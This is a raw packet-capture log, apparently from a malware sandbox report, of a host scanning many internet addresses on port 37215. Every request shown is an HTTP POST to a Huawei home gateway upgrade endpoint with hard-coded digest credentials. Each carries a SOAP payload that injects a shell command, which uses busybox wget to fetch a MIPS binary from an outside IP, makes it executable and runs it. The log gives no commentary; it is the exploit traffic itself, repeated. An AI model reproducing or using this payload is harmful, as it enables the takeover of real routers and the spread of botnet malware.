                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            778192.168.2.134396241.212.41.21837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.759598970 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            779192.168.2.1336230197.0.213.10137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.761060953 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            780192.168.2.1359392156.167.31.037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.762083054 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            781192.168.2.134393041.218.218.2937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.763209105 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            782192.168.2.1343254156.81.150.3337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.764373064 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            783192.168.2.134273241.182.157.12637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.765712023 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            784192.168.2.1352936197.122.248.8837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.766582012 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            785192.168.2.1359890197.148.119.537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.767729998 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            786192.168.2.135366041.150.135.10337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.768716097 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            787192.168.2.133578241.101.121.16937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.770030975 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
